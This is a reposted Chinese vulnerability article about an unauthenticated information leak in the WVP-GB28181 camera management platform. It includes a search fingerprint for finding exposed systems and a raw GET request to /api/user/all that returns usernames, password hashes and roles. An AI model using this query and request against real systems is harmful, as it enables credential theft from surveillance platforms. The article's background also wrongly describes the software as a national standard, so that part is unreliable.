WVP-GB28181摄像头管理端敏感信息泄露漏洞附POC

admin 2025-12-25 02:46:19 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: WVP-GB28181摄像头管理平台存在敏感信息泄露漏洞,攻击者可利用/api/user/all接口获取用户名、密码哈希及权限等数据。该漏洞影响wvp-pro等版本,建议利用关键词国标28181排查资产并及时联系厂商获取补丁修复以降低风险。 综合评分: 85 文章分类: 漏洞POC,漏洞分析,漏洞预警,数据泄露,WEB安全


cover_image

WVP-GB28181摄像头管理端 敏感信息泄露漏洞 附POC

原创

安服仔

北风漏洞复现文库

2025年12月24日 10:03 广东

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

#

#

01

漏洞名称

WVP-GB28181摄像头平台接口/api/user/all存在信息泄露漏洞

02

影响版本

主要影响WVP-GB28181摄像头管理平台(如wvp-pro等版本)

03

漏洞简介

WVP-GB28181是我国监控视频信息技术的重要标准,它是指基于IP网络的视频监控系统技术要求和测试方法的标准。该标准的制定,旨在规范和统一我国监控视频信息技术领域的发展,提高监控视频系统的技术水平和应用质量,保障公共安全和社会秩序的需要。攻击者可通过访问平台API接口/api/user/all,获取系统用户的敏感信息,包括用户名、密码(通常为MD5加密形式)、创建时间、更新时间及角色权限等。

04

资产测绘

body="国标28181"

05

漏洞复现

 POC

GET /api/user/all HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Accept-Charset: utf-8Accept-Encoding: gzip, deflateConnection:close

06

修复建议

联系厂商获取官方补丁进行修复。

07

往期回顾


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:北风漏洞复现文库 安服仔《WVP-GB28181摄像头管理端 敏感信息泄露漏洞 附POC》

评论:0   参与:  4